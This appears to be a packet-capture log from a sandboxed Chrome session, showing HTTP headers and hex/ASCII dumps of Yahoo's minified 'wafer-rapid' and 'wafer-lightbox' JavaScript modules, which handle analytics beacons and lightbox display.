                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: B6ONl0aCSfcrGikpc+jxEYkMksgHzm0OieeiUkxQmTGiYkO0+ghRKUnHbHL1cLghCsJQUKcHxH0=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 0X45596YTD3CVYJP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sat, 05 Oct 2024 05:56:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 02 Jul 2024 08:11:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "da320d39602c7372e993ed8ca6026a92"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: D1eAABL3ZzqbxuHoTmJS4lz3o8UHw1Tk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 12677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 307003
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 72 61 70 69 64 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 76 61 72 20 72 3d 5b 5d 2c 6e 3d 21 30 2c 69 3d 21 31 2c 61 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 2c 73 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 6f 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 72 2e 70 75 73 68 28 6f 2e 76 61 6c 75 65 29 2c 21 74 7c 7c 72 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ngth;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},g=function(){function e(e,t){var r=[],n=!0,i=!1,a=void 0;try{for(var o,s=e[Symbol.iterator]();!(n=(o=s.next()).done)&&(r.push(o.value),!t||r.lengt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 72 2d 6f 66 66 73 65 74 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 63 3d 67 28 6c 2c 32 29 2c 75 3d 63 5b 30 5d 2c 66 3d 63 5b 31 5d 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 74 72 69 67 67 65 72 2d 69 6e 74 65 72 76 61 6c 22 29 3b 22 63 6c 69 63 6b 22 21 3d 3d 73 26 26 22 65 61 63 68 43 6c 69 63 6b 22 21 3d 3d 73 7c 7c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 61 73 2d 72 61 70 69 64 2d 63 6c 69 63 6b 22 2c 22 68 61 73 2d 77 61 66 65 72 2d 63 6c 69 63 6b 22 29 3b 76 61 72 20 70 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 6d 65 74 68 6f 64 22 29 2c 68 3d 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 6e 61 6d 65 22 29 7c 7c 22 22 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r-offset")||"").split(" "),c=g(l,2),u=c[0],f=c[1],d=e.getAttribute(I+"rapid-trigger-interval");"click"!==s&&"eachClick"!==s||e.classList.add("has-rapid-click","has-wafer-click");var p=e.getAttribute(I+"rapid-method"),h=(e.getAttribute(I+"rapid-name")||"")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 63 6f 6e 45 76 65 6e 74 22 3d 3d 3d 61 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 62 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 52 61 70 69 64 22 2c 65 6c 65 6d 3a 63 2c 6d 65 74 61 3a 7b 69 31 33 6e 3a 6c 2c 6e 61 6d 65 3a 73 2c 74 79 70 65 3a 22 62 65 61 63 6f 6e 45 76 65 6e 74 22 7d 7d 29 2c 22 69 6e 74 65 6e 74 69 6f 6e 61 6c 56 69 65 77 22 3d 3d 3d 69 3f 65 2e 62 65 61 63 6f 6e 45 76 65 6e 74 28 22 69 6e 74 65 6e 74 69 6f 6e 61 6c 20 76 69 65 77 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 6c 2c 7b 6c 6c 33 3a 73 7d 29 29 3a 65 2e 62 65 61 63 6f 6e 45 76 65 6e 74 28 73 2c 6c 29 7d 65 6c 73 65 20 69 66 28 22 62 65 61 63 6f 6e 4c 69 6e 6b 56 69 65 77 73 22 3d 3d 3d 61 29 65 2e 62 65 61 63 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: conEvent"===a){var c=this._util.elem;b.emitLog({name:"WaferRapid",elem:c,meta:{i13n:l,name:s,type:"beaconEvent"}}),"intentionalView"===i?e.beaconEvent("intentional view",Object.assign({},l,{ll3:s})):e.beaconEvent(s,l)}else if("beaconLinkViews"===a)e.beaco
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 65 6d 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 68 61 73 2d 72 61 70 69 64 2d 63 6c 69 63 6b 22 29 26 26 74 68 69 73 2e 5f 62 65 61 63 6f 6e 54 72 69 67 67 65 72 28 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 52 61 70 69 64 4d 6f 75 73 65 45 6e 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 65 64 7c 7c 28 56 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 45 6e 74 65 72 54 69 6d 65 6f 75 74 2c 74 68 69 73 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 45 6e 74 65 72 54 69 6d 65 6f 75 74 3d 6a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 62 65 61 63 6f 6e 54 72 69 67 67 65 72 28 29 7d 2c 31 30 30 2c 74 68 69 73 29 29 7d 7d 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: em.classList.contains("has-rapid-click")&&this._beaconTrigger()}},{key:"handleRapidMouseEnter",value:function(){var e=this;this._destroyed||(V(this._state.mouseEnterTimeout,this),this._state.mouseEnterTimeout=j(function(){e._beaconTrigger()},100,this))}},
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 52 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 72 2c 6e 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),R=function e(t,r,n){null===t&&(t=Function.prototype);var i=Object.getOwnPropertyDescriptor(t,r);if(void 0===i){var a=Object.getPrototypeO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 6f 2e 72 65 6d 6f 76 65 4d 6f 64 75 6c 65 28 6c 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 74 72 61 63 6b 65 64 22 29 2c 21 30 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 65 2e 72 6f 6f 74 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 64 6f 63 75 6d 65 6e 74 3a 72 2c 69 3d 65 2e 73 65 6c 65 63 74 6f 72 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 22 2e 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 3a 69 2c 6c 3d 65 2e 76 61 6c 69 64 61 74 65 44 65 6c 61 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o.removeModule(l),e.classList.remove("wafer-rapid-tracked"),!0},H=function(e){function t(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},r=e.root,n=void 0===r?document:r,i=e.selector,a=void 0===i?".wafer-rapid-module":i,l=e.validateDelay
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 69 66 28 52 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 73 79 6e 63 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 6e 3d 46 28 65 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 71 28 6e 2c 72 29 3b 76 61 72 20 69 3d 4e 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 29 29 3b 69 2e 6c 65 6e 67 74 68 3e 30 26 26 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: if(R(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"sync",this).call(this,e),e){var r=this._state.elementInstances,n=F(e);if(n)return void q(n,r);var i=N(e.getElementsByClassName("wafer-rapid-module"));i.length>0&&Array.prototype.forEach.call(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC977INData Raw: 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 5f 73 74 61 74 65 2c 6e 3d 72 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 69 3d 72 2e 65 6c 65 6d 65 6e 74 57 69 74 68 49 6e 74 65 6e 74 69 6f 6e 61 6c 56 69 65 77 65 64 49 6e 73 74 61 6e 63 65 73 3b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 29 26 26 7a 28 65 2c 6e 2c 69 29 3b 76 61 72 20 61 3d 4e 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 2c 6e 29 29 3b 61 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t.getPrototypeOf(t.prototype),"destroy",this).call(this);var r=this._state,n=r.elementInstances,i=r.elementWithIntentionalViewedInstances;e.classList.contains("wafer-rapid-module")&&z(e,n,i);var a=N(e.getElementsByClassName("wafer-rapid-module",n));a.leng


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              106192.168.2.45113187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC542OUTGET /aaq/wf/wf-lightbox-1.10.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: QCsaAVSYmq+Ot311stCddnhlgngm9PPxQtMVpVGUTVkAyqJksWXbx3Lh6Czb54VcAUNpYKd7pqg=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: RTANMCP4J8H648GE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 05 Sep 2024 03:14:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 01 Mar 2023 01:43:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "69831b2f7b26bc6dd6321c8dcde85968"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: K.68hs0p5c2EOJjfXuKP9dx0XBa4hSTK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 13914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 2908783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-lightbox",[],t):"object"==typeof exports?exports["wafer-lightbox"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototype
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 70 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 66 3d 70 2e 62 61 73 65 2c 64 3d 70 2e 63 6f 6e 73 74 61 6e 74 73 2c 77 3d 70 2e 66 65 61 74 75 72 65 73 2c 62 3d 70 2e 75 74 69 6c 73 2c 79 3d 70 2e 57 61 66 65 72 42 61 73 65 43 6c 61 73 73 2c 67 3d 62 2e 62 69 6e 64 45 76 65 6e 74 2c 76 3d 62 2e 66 69 6e 64 41 6e 63 65 73 74 6f 72 2c 6d 3d 62 2e 67 65 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 73 2c 5f 3d 62 2e 67 65 74 54 65 6d 70 6c 61 74 65 43 6f 6e 74 65 6e 74 2c 43 3d 62 2e 72 65 6d 6f 76 65 54 72 61 6e 73 69 74 69 6f 6e 2c 78 3d 62 2e 73 65 74 54 69 6d 65 6f 75 74 2c 45 3d 62 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 2c 6b 3d 62 2e 75 6e 62 69 6e 64 45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &e(t.prototype,o),n&&e(t,n),t}}(),p=window.wafer,f=p.base,d=p.constants,w=p.features,b=p.utils,y=p.WaferBaseClass,g=b.bindEvent,v=b.findAncestor,m=b.getFocusableElems,_=b.getTemplateContent,C=b.removeTransition,x=b.setTimeout,E=b.setTransition,k=b.unbindE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 76 6f 69 64 20 30 3d 3d 3d 62 3f 30 3a 4e 75 6d 62 65 72 28 62 29 2c 6b 65 79 3a 64 2c 73 65 6c 65 63 74 6f 72 3a 61 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 69 2c 74 61 72 67 65 74 3a 66 2c 74 72 69 67 67 65 72 3a 77 2c 77 72 61 70 70 65 72 4d 61 70 3a 63 7d 2c 6d 26 26 28 68 2e 5f 75 74 69 6c 2e 70 61 67 65 54 61 72 67 65 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6d 29 29 2c 68 2e 5f 73 74 61 74 65 3d 75 28 7b 63 6f 6e 74 65 6e 74 4f 62 73 65 72 76 65 72 3a 6e 75 6c 6c 2c 66 69 72 73 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 3a 6e 75 6c 6c 2c 6c 61 73 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 3a 6e 75 6c 6c 2c 74 6f 75 63 68 65 6e 64 59 3a 30 2c 74 6f 75 63 68 73 74 61 72 74 59 3a 30 2c 77 69 6c 6c 43 6c 6f 73 65 3a 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: void 0===b?0:Number(b),key:d,selector:a,successClass:i,target:f,trigger:w,wrapperMap:c},m&&(h._util.pageTarget=document.querySelector(m)),h._state=u({contentObserver:null,firstFocusableElem:null,lastFocusableElem:null,touchendY:0,touchstartY:0,willClose:n
